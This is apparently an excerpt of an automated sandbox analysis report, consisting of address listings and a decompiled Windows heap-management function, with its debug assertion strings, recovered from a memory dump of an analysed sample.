                                                                                                            0x011248dc
                                                                                                            0x011248ec
                                                                                                            0x00000000
                                                                                                            0x011248ec
                                                                                                            0x011248b2
                                                                                                            0x011248bc
                                                                                                            0x011248be
                                                                                                            0x011248c1
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x011248c3
                                                                                                            0x011248c3
                                                                                                            0x011248c6
                                                                                                            0x011248c9
                                                                                                            0x011248cc
                                                                                                            0x011248d1
                                                                                                            0x011248d4
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x011248d6
                                                                                                            0x011248d7
                                                                                                            0x011248da
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x011248da
                                                                                                            0x0112494f
                                                                                                            0x01124955
                                                                                                            0x01124959
                                                                                                            0x01124978
                                                                                                            0x0112497d
                                                                                                            0x0112495b
                                                                                                            0x01124970
                                                                                                            0x01124975
                                                                                                            0x01124986
                                                                                                            0x01124987
                                                                                                            0x0112498a
                                                                                                            0x0112498d
                                                                                                            0x01124997
                                                                                                            0x011247ef
                                                                                                            0x011247ef
                                                                                                            0x011247ef
                                                                                                            0x00000000
                                                                                                            0x011247ef
                                                                                                            0x01124890
                                                                                                            0x01124890
                                                                                                            0x01124891
                                                                                                            0x01124891
                                                                                                            0x01124894
                                                                                                            0x01124897
                                                                                                            0x0112489d
                                                                                                            0x011248a0
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x011248a2
                                                                                                            0x011248a3
                                                                                                            0x011248a6
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x011248a6
                                                                                                            0x011248fb
                                                                                                            0x01124901
                                                                                                            0x01124905
                                                                                                            0x01124924
                                                                                                            0x01124929
                                                                                                            0x01124907
                                                                                                            0x0112491c
                                                                                                            0x01124921
                                                                                                            0x0112492f
                                                                                                            0x01124935
                                                                                                            0x01124936
                                                                                                            0x01124939
                                                                                                            0x01124942
                                                                                                            0x00000000
                                                                                                            0x01124947
                                                                                                            0x01124835
                                                                                                            0x0112483b
                                                                                                            0x0112483f
                                                                                                            0x0112485e
                                                                                                            0x01124863
                                                                                                            0x01124841
                                                                                                            0x01124856
                                                                                                            0x0112485b
                                                                                                            0x01124869
                                                                                                            0x0112486c
                                                                                                            0x0112486f
                                                                                                            0x011247e7
                                                                                                            0x011247e7
                                                                                                            0x00000000
                                                                                                            0x011247ec
                                                                                                            0x011247aa
                                                                                                            0x011247b0
                                                                                                            0x011247b4
                                                                                                            0x011247d3
                                                                                                            0x011247d8
                                                                                                            0x011247b6
                                                                                                            0x011247cb
                                                                                                            0x011247d0
                                                                                                            0x011247de
                                                                                                            0x011247df
                                                                                                            0x011247e2
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0112476f
                                                                                                            0x0112476f
                                                                                                            0x01124778
                                                                                                            0x01124785
                                                                                                            0x01124787
                                                                                                            0x0112478c
                                                                                                            0x0112478e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01124790
                                                                                                            0x01124792
                                                                                                            0x01124794
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01124796
                                                                                                            0x01124799
                                                                                                            0x00000000
                                                                                                            0x01124799
                                                                                                            0x00000000
                                                                                                            0x011245c3
                                                                                                            0x011245c3
                                                                                                            0x011245c7
                                                                                                            0x011245c7
                                                                                                            0x011245ca
                                                                                                            0x011245cf
                                                                                                            0x011245d3
                                                                                                            0x011245df
                                                                                                            0x011245e4
                                                                                                            0x011245e6
                                                                                                            0x011245e8
                                                                                                            0x011245ed
                                                                                                            0x011245ed
                                                                                                            0x011245f2
                                                                                                            0x011245f2
                                                                                                            0x011245f7
                                                                                                            0x011245fc
                                                                                                            0x01124602
                                                                                                            0x01124606
                                                                                                            0x01124609
                                                                                                            0x0112460f
                                                                                                            0x011246de
                                                                                                            0x011246e3
                                                                                                            0x011246e5
                                                                                                            0x011246ec
                                                                                                            0x011246ee
                                                                                                            0x011246f6
                                                                                                            0x011246f6
                                                                                                            0x011246f6
                                                                                                            0x011246f6
                                                                                                            0x011246ec
                                                                                                            0x01124615
                                                                                                            0x01124615
                                                                                                            0x0112461d
                                                                                                            0x0112462e
                                                                                                            0x0112462e
                                                                                                            0x0112461d
                                                                                                            0x0112460f
                                                                                                            0x01124609
                                                                                                            0x011246fd
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01124710
                                                                                                            0x0112471a
                                                                                                            0x01124720
                                                                                                            0x01124720
                                                                                                            0x01124722
                                                                                                            0x0112472c
                                                                                                            0x00000000
                                                                                                            0x0112472e
                                                                                                            0x0112472e
                                                                                                            0x00000000
                                                                                                            0x0112472e
                                                                                                            0x0112472c
                                                                                                            0x01124738
                                                                                                            0x0112473c
                                                                                                            0x0112474b
                                                                                                            0x01124751
                                                                                                            0x01124751
                                                                                                            0x00000000
                                                                                                            0x0112473c
                                                                                                            0x011248f4
                                                                                                            0x011248f4
                                                                                                            0x00000000
                                                                                                            0x011248f4

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                                                            • API String ID: 0-1357697941
                                                                                                            • Opcode ID: c331580b162a771b1d7a0e2b793134e092b5acb37fbca261521f69f1b2fcdf65
                                                                                                            • Instruction ID: ece57c6cdab98fb3fd61a31839bbbe94a34c237957a41b55f94f9c5c32152d8b
                                                                                                            • Opcode Fuzzy Hash: c331580b162a771b1d7a0e2b793134e092b5acb37fbca261521f69f1b2fcdf65
                                                                                                            • Instruction Fuzzy Hash: 71F18871600666EFDB2DCFA9C480BBABBF5FF49304F048029E1869BA41D770A965CF51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0108A309 Relevance: 8.2, Strings: 6, Instructions: 687COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 72%
                                                                                                            			E0108A309(signed int __ecx, signed int __edx, signed int _a4, char _a8) {
				char _v8;
				signed short _v12;
				signed short _v16;
				signed int _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				unsigned int _v52;
				signed int _v56;
				void* _v60;
				intOrPtr _v64;
				void* _v72;
				void* __ebx;
				void* __edi;
				void* __ebp;
				unsigned int _t246;
				signed char _t247;
				signed short _t249;
				unsigned int _t256;
				signed int _t262;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				intOrPtr _t270;
				signed int _t280;
				signed int _t286;
				signed int _t289;
				intOrPtr _t290;
				signed int _t291;
				signed int _t317;
				signed short _t320;
				intOrPtr _t327;
				signed int _t339;
				signed int _t344;
				signed int _t347;
				intOrPtr _t348;
				signed int _t350;
				signed int _t352;
				signed int _t353;
				signed int _t356;
				intOrPtr _t357;
				intOrPtr _t366;
				signed int _t367;
				signed int _t370;
				intOrPtr _t371;
				signed int _t372;
				signed int _t394;
				signed short _t402;
				intOrPtr _t404;
				intOrPtr _t415;
				signed int _t430;
				signed int _t433;
				signed int _t437;
				signed int _t445;
				signed short _t446;
				signed short _t449;
				signed short _t452;
				signed int _t455;
				signed int _t460;
				signed short* _t468;
				signed int _t480;
				signed int _t481;
				signed int _t483;
				intOrPtr _t484;
				signed int _t491;
				unsigned int _t506;
				unsigned int _t508;
				signed int _t513;
				signed int _t514;
				signed int _t521;
				signed short* _t533;
				signed int _t541;
				signed int _t543;
				signed int _t546;
				unsigned int _t551;
				signed int _t553;

				_t450 = __ecx;
				_t553 = __ecx;
				_t539 = __edx;
				_v28 = 0;
				_v40 = 0;
				if(( *(__ecx + 0xcc) ^  *0x1158a68) != 0) {
					_push(_a4);
					_t513 = __edx;
					L11:
					_t246 = E0108A830(_t450, _t513);
					L7:
					return _t246;
				}
				if(_a8 != 0) {
					__eflags =  *(__edx + 2) & 0x00000008;
					if(( *(__edx + 2) & 0x00000008) != 0) {
						 *((intOrPtr*)(__ecx + 0x230)) =  *((intOrPtr*)(__ecx + 0x230)) - 1;
						_t430 = E0108DF24(__edx,  &_v12,  &_v16);
						__eflags = _t430;
						if(_t430 != 0) {
							_t157 = _t553 + 0x234;
							 *_t157 =  *(_t553 + 0x234) - _v16;
							__eflags =  *_t157;
						}
					}
					_t445 = _a4;
					_t514 = _t539;
					_v48 = _t539;
					L14:
					_t247 =  *((intOrPtr*)(_t539 + 6));
					__eflags = _t247;
					if(_t247 == 0) {
						_t541 = _t553;
					} else {
						_t541 = (_t539 & 0xffff0000) - ((_t247 & 0x000000ff) << 0x10) + 0x10000;
						__eflags = _t541;
					}
					_t249 = 7 + _t445 * 8 + _t514;
					_v12 = _t249;
					__eflags =  *_t249 - 3;
					if( *_t249 == 3) {
						_v16 = _t514 + _t445 * 8 + 8;
						E01069373(_t553, _t514 + _t445 * 8 + 8);
						_t452 = _v16;
						_v28 =  *(_t452 + 0x10);
						 *((intOrPtr*)(_t541 + 0x30)) =  *((intOrPtr*)(_t541 + 0x30)) - 1;
						_v36 =  *(_t452 + 0x14);
						 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) - ( *(_t452 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) +  *(_t452 + 0x14);
						 *((intOrPtr*)(_t553 + 0x1f8)) =  *((intOrPtr*)(_t553 + 0x1f8)) - 1;
						_t256 =  *(_t452 + 0x14);
						__eflags = _t256 - 0x7f000;
						if(_t256 >= 0x7f000) {
							_t142 = _t553 + 0x1ec;
							 *_t142 =  *(_t553 + 0x1ec) - _t256;
							__eflags =  *_t142;
							_t256 =  *(_t452 + 0x14);
						}
						_t513 = _v48;
						_t445 = _t445 + (_t256 >> 3) + 0x20;
						_a4 = _t445;
						_v40 = 1;
					} else {
						_t27 =  &_v36;
						 *_t27 = _v36 & 0x00000000;
						__eflags =  *_t27;
					}
					__eflags =  *((intOrPtr*)(_t553 + 0x54)) -  *((intOrPtr*)(_t513 + 4));
					if( *((intOrPtr*)(_t553 + 0x54)) ==  *((intOrPtr*)(_t513 + 4))) {
						_v44 = _t513;
						_t262 = E0106A9EF(_t541, _t513);
						__eflags = _a8;
						_v32 = _t262;
						if(_a8 != 0) {
							__eflags = _t262;
							if(_t262 == 0) {
								goto L19;
							}
						}
						__eflags =  *0x1158748 - 1;
						if( *0x1158748 >= 1) {
							__eflags = _t262;
							if(_t262 == 0) {
								_t415 =  *[fs:0x30];
								__eflags =  *(_t415 + 0xc);
								if( *(_t415 + 0xc) == 0) {
									_push("HEAP: ");
									E0106B150();
								} else {
									E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push("(UCRBlock != NULL)");
								E0106B150();
								__eflags =  *0x1157bc8;
								if( *0x1157bc8 == 0) {
									__eflags = 1;
									E01122073(_t445, 1, _t541, 1);
								}
								_t513 = _v48;
								_t445 = _a4;
							}
						}
						_t350 = _v40;
						_t480 = _t445 << 3;
						_v20 = _t480;
						_t481 = _t480 + _t513;
						_v24 = _t481;
						__eflags = _t350;
						if(_t350 == 0) {
							_t481 = _t481 + 0xfffffff0;
							__eflags = _t481;
						}
						_t483 = (_t481 & 0xfffff000) - _v44;
						__eflags = _t483;
						_v52 = _t483;
						if(_t483 == 0) {
							__eflags =  *0x1158748 - 1;
							if( *0x1158748 < 1) {
								goto L9;
							}
							__eflags = _t350;
							goto L146;
						} else {
							_t352 = E0109174B( &_v44,  &_v52, 0x4000);
							__eflags = _t352;
							if(_t352 < 0) {
								goto L94;
							}
							_t353 = E01087D50();
							_t447 = 0x7ffe0380;
							__eflags = _t353;
							if(_t353 != 0) {
								_t356 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t356 = 0x7ffe0380;
							}
							__eflags =  *_t356;
							if( *_t356 != 0) {
								_t357 =  *[fs:0x30];
								__eflags =  *(_t357 + 0x240) & 0x00000001;
								if(( *(_t357 + 0x240) & 0x00000001) != 0) {
									E011214FB(_t447, _t553, _v44, _v52, 5);
								}
							}
							_t358 = _v32;
							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
							_t484 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t484 - 0x7f000;
							if(_t484 >= 0x7f000) {
								_t90 = _t553 + 0x1ec;
								 *_t90 =  *(_t553 + 0x1ec) - _t484;
								__eflags =  *_t90;
							}
							E01069373(_t553, _t358);
							_t486 = _v32;
							 *((intOrPtr*)(_v32 + 0x14)) =  *((intOrPtr*)(_v32 + 0x14)) + _v52;
							E01069819(_t486);
							 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) + (_v52 >> 0xc);
							 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) - _v52;
							_t366 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t366 - 0x7f000;
							if(_t366 >= 0x7f000) {
								_t104 = _t553 + 0x1ec;
								 *_t104 =  *(_t553 + 0x1ec) + _t366;
								__eflags =  *_t104;
							}
							__eflags = _v40;
							if(_v40 == 0) {
								_t533 = _v52 + _v44;
								_v32 = _t533;
								_t533[2] =  *((intOrPtr*)(_t553 + 0x54));
								__eflags = _v24 - _v52 + _v44;
								if(_v24 == _v52 + _v44) {
									__eflags =  *(_t553 + 0x4c);
									if( *(_t553 + 0x4c) != 0) {
										_t533[1] = _t533[1] ^ _t533[0] ^  *_t533;
										 *_t533 =  *_t533 ^  *(_t553 + 0x50);
									}
								} else {
									_t449 = 0;
									_t533[3] = 0;
									_t533[1] = 0;
									_t394 = _v20 - _v52 >> 0x00000003 & 0x0000ffff;
									_t491 = _t394;
									 *_t533 = _t394;
									__eflags =  *0x1158748 - 1; // 0x0
									if(__eflags >= 0) {
										__eflags = _t491 - 1;
										if(_t491 <= 1) {
											_t404 =  *[fs:0x30];
											__eflags =  *(_t404 + 0xc);
											if( *(_t404 + 0xc) == 0) {
												_push("HEAP: ");
												E0106B150();
											} else {
												E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
											}
											_push("((LONG)FreeEntry->Size > 1)");
											E0106B150();
											_pop(_t491);
											__eflags =  *0x1157bc8 - _t449; // 0x0
											if(__eflags == 0) {
												__eflags = 0;
												_t491 = 1;
												E01122073(_t449, 1, _t541, 0);
											}
											_t533 = _v32;
										}
									}
									_t533[1] = _t449;
									__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
									if( *((intOrPtr*)(_t541 + 0x18)) != _t541) {
										_t402 = (_t533 - _t541 >> 0x10) + 1;
										_v16 = _t402;
										__eflags = _t402 - 0xfe;
										if(_t402 >= 0xfe) {
											_push(_t491);
											_push(_t449);
											E0112A80D( *((intOrPtr*)(_t541 + 0x18)), 3, _t533, _t541);
											_t533 = _v48;
											_t402 = _v32;
										}
										_t449 = _t402;
									}
									_t533[3] = _t449;
									E0108A830(_t553, _t533,  *_t533 & 0x0000ffff);
									_t447 = 0x7ffe0380;
								}
							}
							_t367 = E01087D50();
							__eflags = _t367;
							if(_t367 != 0) {
								_t370 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t370 = _t447;
							}
							__eflags =  *_t370;
							if( *_t370 != 0) {
								_t371 =  *[fs:0x30];
								__eflags =  *(_t371 + 0x240) & 1;
								if(( *(_t371 + 0x240) & 1) != 0) {
									__eflags = E01087D50();
									if(__eflags != 0) {
										_t447 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
									}
									E01121411(_t447, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _v40, _v36,  *_t447 & 0x000000ff);
								}
							}
							_t372 = E01087D50();
							_t546 = 0x7ffe038a;
							_t446 = 0x230;
							__eflags = _t372;
							if(_t372 != 0) {
								_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							} else {
								_t246 = 0x7ffe038a;
							}
							__eflags =  *_t246;
							if( *_t246 == 0) {
								goto L7;
							} else {
								__eflags = E01087D50();
								if(__eflags != 0) {
									_t546 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + _t446;
									__eflags = _t546;
								}
								_push( *_t546 & 0x000000ff);
								_push(_v36);
								_push(_v40);
								goto L120;
							}
						}
					} else {
						L19:
						_t31 = _t513 + 0x101f; // 0x101f
						_t455 = _t31 & 0xfffff000;
						_t32 = _t513 + 0x28; // 0x28
						_v44 = _t455;
						__eflags = _t455 - _t32;
						if(_t455 == _t32) {
							_t455 = _t455 + 0x1000;
							_v44 = _t455;
						}
						_t265 = _t445 << 3;
						_v24 = _t265;
						_t266 = _t265 + _t513;
						__eflags = _v40;
						_v20 = _t266;
						if(_v40 == 0) {
							_t266 = _t266 + 0xfffffff0;
							__eflags = _t266;
						}
						_t267 = _t266 & 0xfffff000;
						_v52 = _t267;
						__eflags = _t267 - _t455;
						if(_t267 < _t455) {
							__eflags =  *0x1158748 - 1; // 0x0
							if(__eflags < 0) {
								L9:
								_t450 = _t553;
								L10:
								_push(_t445);
								goto L11;
							}
							__eflags = _v40;
							L146:
							if(__eflags == 0) {
								goto L9;
							}
							_t270 =  *[fs:0x30];
							__eflags =  *(_t270 + 0xc);
							if( *(_t270 + 0xc) == 0) {
								_push("HEAP: ");
								E0106B150();
							} else {
								E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("(!TrailingUCR)");
							E0106B150();
							__eflags =  *0x1157bc8;
							if( *0x1157bc8 == 0) {
								__eflags = 0;
								E01122073(_t445, 1, _t541, 0);
							}
							L152:
							_t445 = _a4;
							L153:
							_t513 = _v48;
							goto L9;
						}
						_v32 = _t267;
						_t280 = _t267 - _t455;
						_v32 = _v32 - _t455;
						__eflags = _a8;
						_t460 = _v32;
						_v52 = _t460;
						if(_a8 != 0) {
							L27:
							__eflags = _t280;
							if(_t280 == 0) {
								L33:
								_t446 = 0;
								__eflags = _v40;
								if(_v40 == 0) {
									_t468 = _v44 + _v52;
									_v36 = _t468;
									_t468[2] =  *((intOrPtr*)(_t553 + 0x54));
									__eflags = _v20 - _v52 + _v44;
									if(_v20 == _v52 + _v44) {
										__eflags =  *(_t553 + 0x4c);
										if( *(_t553 + 0x4c) != 0) {
											_t468[1] = _t468[1] ^ _t468[0] ^  *_t468;
											 *_t468 =  *_t468 ^  *(_t553 + 0x50);
										}
									} else {
										_t468[3] = 0;
										_t468[1] = 0;
										_t317 = _v24 - _v52 - _v44 + _t513 >> 0x00000003 & 0x0000ffff;
										_t521 = _t317;
										 *_t468 = _t317;
										__eflags =  *0x1158748 - 1; // 0x0
										if(__eflags >= 0) {
											__eflags = _t521 - 1;
											if(_t521 <= 1) {
												_t327 =  *[fs:0x30];
												__eflags =  *(_t327 + 0xc);
												if( *(_t327 + 0xc) == 0) {
													_push("HEAP: ");
													E0106B150();
												} else {
													E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
												}
												_push("(LONG)FreeEntry->Size > 1");
												E0106B150();
												__eflags =  *0x1157bc8 - _t446; // 0x0
												if(__eflags == 0) {
													__eflags = 1;
													E01122073(_t446, 1, _t541, 1);
												}
												_t468 = _v36;
											}
										}
										_t468[1] = _t446;
										_t522 =  *((intOrPtr*)(_t541 + 0x18));
										__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
										if( *((intOrPtr*)(_t541 + 0x18)) == _t541) {
											_t320 = _t446;
										} else {
											_t320 = (_t468 - _t541 >> 0x10) + 1;
											_v12 = _t320;
											__eflags = _t320 - 0xfe;
											if(_t320 >= 0xfe) {
												_push(_t468);
												_push(_t446);
												E0112A80D(_t522, 3, _t468, _t541);
												_t468 = _v52;
												_t320 = _v28;
											}
										}
										_t468[3] = _t320;
										E0108A830(_t553, _t468,  *_t468 & 0x0000ffff);
									}
								}
								E0108B73D(_t553, _t541, _v44 + 0xffffffe8, _v52, _v48,  &_v8);
								E0108A830(_t553, _v64, _v24);
								_t286 = E01087D50();
								_t542 = 0x7ffe0380;
								__eflags = _t286;
								if(_t286 != 0) {
									_t289 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								} else {
									_t289 = 0x7ffe0380;
								}
								__eflags =  *_t289;
								if( *_t289 != 0) {
									_t290 =  *[fs:0x30];
									__eflags =  *(_t290 + 0x240) & 1;
									if(( *(_t290 + 0x240) & 1) != 0) {
										__eflags = E01087D50();
										if(__eflags != 0) {
											_t542 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
											__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										}
										E01121411(_t446, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _t446, _t446,  *_t542 & 0x000000ff);
									}
								}
								_t291 = E01087D50();
								_t543 = 0x7ffe038a;
								__eflags = _t291;
								if(_t291 != 0) {
									_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
								} else {
									_t246 = 0x7ffe038a;
								}
								__eflags =  *_t246;
								if( *_t246 != 0) {
									__eflags = E01087D50();
									if(__eflags != 0) {
										_t543 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
										__eflags = _t543;
									}
									_push( *_t543 & 0x000000ff);
									_push(_t446);
									_push(_t446);
									L120:
									_push( *(_t553 + 0x74) << 3);
									_push(_v52);
									_t246 = E01121411(_t446, _t553, _v44, __eflags);
								}
								goto L7;
							}
							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
							_t339 = E0109174B( &_v44,  &_v52, 0x4000);
							__eflags = _t339;
							if(_t339 < 0) {
								L94:
								 *((intOrPtr*)(_t553 + 0x210)) =  *((intOrPtr*)(_t553 + 0x210)) + 1;
								__eflags = _v40;
								if(_v40 == 0) {
									goto L153;
								}
								E0108B73D(_t553, _t541, _v28 + 0xffffffe8, _v36, _v48,  &_a4);
								goto L152;
							}
							_t344 = E01087D50();
							__eflags = _t344;
							if(_t344 != 0) {
								_t347 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t347 = 0x7ffe0380;
							}
							__eflags =  *_t347;
							if( *_t347 != 0) {
								_t348 =  *[fs:0x30];
								__eflags =  *(_t348 + 0x240) & 1;
								if(( *(_t348 + 0x240) & 1) != 0) {
									E011214FB(_t445, _t553, _v44, _v52, 6);
								}
							}
							_t513 = _v48;
							goto L33;
						}
						__eflags =  *_v12 - 3;
						_t513 = _v48;
						if( *_v12 == 3) {
							goto L27;
						}
						__eflags = _t460;
						if(_t460 == 0) {
							goto L9;
						}
						__eflags = _t460 -  *((intOrPtr*)(_t553 + 0x6c));
						if(_t460 <  *((intOrPtr*)(_t553 + 0x6c))) {
							goto L9;
						}
						goto L27;
					}
				}
				_t445 = _a4;
				if(_t445 <  *((intOrPtr*)(__ecx + 0x6c))) {
					_t513 = __edx;
					goto L10;
				}
				_t433 =  *((intOrPtr*)(__ecx + 0x74)) + _t445;
				_v20 = _t433;
				if(_t433 <  *((intOrPtr*)(__ecx + 0x70)) || _v20 <  *(__ecx + 0x1e8) >>  *((intOrPtr*)(__ecx + 0x240)) + 3) {
					_t513 = _t539;
					goto L9;
				} else {
					_t437 = E010899BF(__ecx, __edx,  &_a4, 0);
					_t445 = _a4;
					_t514 = _t437;
					_v56 = _t514;
					if(_t445 - 0x201 > 0xfbff) {
						goto L14;
					} else {
						E0108A830(__ecx, _t514, _t445);
						_t506 =  *(_t553 + 0x238);
						_t551 =  *((intOrPtr*)(_t553 + 0x1e8)) - ( *(_t553 + 0x74) << 3);
						_t246 = _t506 >> 4;
						if(_t551 < _t506 - _t246) {
							_t508 =  *(_t553 + 0x23c);
							_t246 = _t508 >> 2;
							__eflags = _t551 - _t508 - _t246;
							if(_t551 > _t508 - _t246) {
								_t246 = E0109ABD8(_t553);
								 *(_t553 + 0x23c) = _t551;
								 *(_t553 + 0x238) = _t551;
							}
						}
						goto L7;
					}
				}
			}



















































































                                                                                                            0x0108a309
                                                                                                            0x0108a316
                                                                                                            0x0108a319
                                                                                                            0x0108a31d
                                                                                                            0x0108a32d
                                                                                                            0x0108a331
                                                                                                            0x010d1e0d
                                                                                                            0x010d1e10
                                                                                                            0x0108a3cb
                                                                                                            0x0108a3cb
                                                                                                            0x0108a3bd
                                                                                                            0x0108a3c3
                                                                                                            0x0108a3c3
                                                                                                            0x0108a33a
                                                                                                            0x010d1e17
                                                                                                            0x010d1e1b
                                                                                                            0x010d1e1d
                                                                                                            0x010d1e2f
                                                                                                            0x010d1e34
                                                                                                            0x010d1e36
                                                                                                            0x010d1e3c
                                                                                                            0x010d1e3c
                                                                                                            0x010d1e3c
                                                                                                            0x010d1e3c
                                                                                                            0x010d1e36
                                                                                                            0x010d1e42
                                                                                                            0x010d1e45
                                                                                                            0x010d1e47
                                                                                                            0x0108a3f8
                                                                                                            0x0108a3f8
                                                                                                            0x0108a3fb
                                                                                                            0x0108a3fd
                                                                                                            0x010d1e50
                                                                                                            0x0108a403
                                                                                                            0x0108a411
                                                                                                            0x0108a411
                                                                                                            0x0108a411
                                                                                                            0x0108a41e
                                                                                                            0x0108a420
                                                                                                            0x0108a424
                                                                                                            0x0108a427
                                                                                                            0x0108a7c9
                                                                                                            0x0108a7cd
                                                                                                            0x0108a7d2
                                                                                                            0x0108a7d9
                                                                                                            0x0108a7e0
                                                                                                            0x0108a7e3
                                                                                                            0x0108a7ed
                                                                                                            0x0108a7f3
                                                                                                            0x0108a7f9
                                                                                                            0x0108a7ff
                                                                                                            0x0108a802
                                                                                                            0x0108a807
                                                                                                            0x0108a809
                                                                                                            0x0108a809
                                                                                                            0x0108a809
                                                                                                            0x0108a80f
                                                                                                            0x0108a80f
                                                                                                            0x0108a812
                                                                                                            0x0108a81c
                                                                                                            0x0108a821
                                                                                                            0x0108a824
                                                                                                            0x0108a42d
                                                                                                            0x0108a42d
                                                                                                            0x0108a42d
                                                                                                            0x0108a42d
                                                                                                            0x0108a42d
                                                                                                            0x0108a436
                                                                                                            0x0108a43a
                                                                                                            0x0108a609
                                                                                                            0x0108a60d
                                                                                                            0x0108a612
                                                                                                            0x0108a616
                                                                                                            0x0108a61a
                                                                                                            0x010d1e57
                                                                                                            0x010d1e59
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d1e5f
                                                                                                            0x0108a620
                                                                                                            0x0108a627
                                                                                                            0x010d1e64
                                                                                                            0x010d1e66
                                                                                                            0x010d1e6c
                                                                                                            0x010d1e72
                                                                                                            0x010d1e76
                                                                                                            0x010d1e95
                                                                                                            0x010d1e9a
                                                                                                            0x010d1e78
                                                                                                            0x010d1e8d
                                                                                                            0x010d1e92
                                                                                                            0x010d1ea0
                                                                                                            0x010d1ea5
                                                                                                            0x010d1eaa
                                                                                                            0x010d1eb2
                                                                                                            0x010d1eb6
                                                                                                            0x010d1eb9
                                                                                                            0x010d1eb9
                                                                                                            0x010d1ebe
                                                                                                            0x010d1ec2
                                                                                                            0x010d1ec2
                                                                                                            0x010d1e66
                                                                                                            0x0108a62d
                                                                                                            0x0108a633
                                                                                                            0x0108a636
                                                                                                            0x0108a63a
                                                                                                            0x0108a63c
                                                                                                            0x0108a640
                                                                                                            0x0108a642
                                                                                                            0x0108a644
                                                                                                            0x0108a644
                                                                                                            0x0108a644
                                                                                                            0x0108a64d
                                                                                                            0x0108a64d
                                                                                                            0x0108a651
                                                                                                            0x0108a655
                                                                                                            0x010d1eca
                                                                                                            0x010d1ed1
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d1ed7
                                                                                                            0x00000000
                                                                                                            0x0108a65b
                                                                                                            0x0108a669
                                                                                                            0x0108a66e
                                                                                                            0x0108a670
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0108a676
                                                                                                            0x0108a67b
                                                                                                            0x0108a680
                                                                                                            0x0108a682
                                                                                                            0x010d1f1a
                                                                                                            0x0108a688
                                                                                                            0x0108a688
                                                                                                            0x0108a688
                                                                                                            0x0108a68a
                                                                                                            0x0108a68d
                                                                                                            0x010d1f24
                                                                                                            0x010d1f2a
                                                                                                            0x010d1f31
                                                                                                            0x010d1f43
                                                                                                            0x010d1f43
                                                                                                            0x010d1f31
                                                                                                            0x0108a693
                                                                                                            0x0108a697
                                                                                                            0x0108a69d
                                                                                                            0x0108a6a0
                                                                                                            0x0108a6a6
                                                                                                            0x0108a6a8
                                                                                                            0x0108a6a8
                                                                                                            0x0108a6a8
                                                                                                            0x0108a6a8
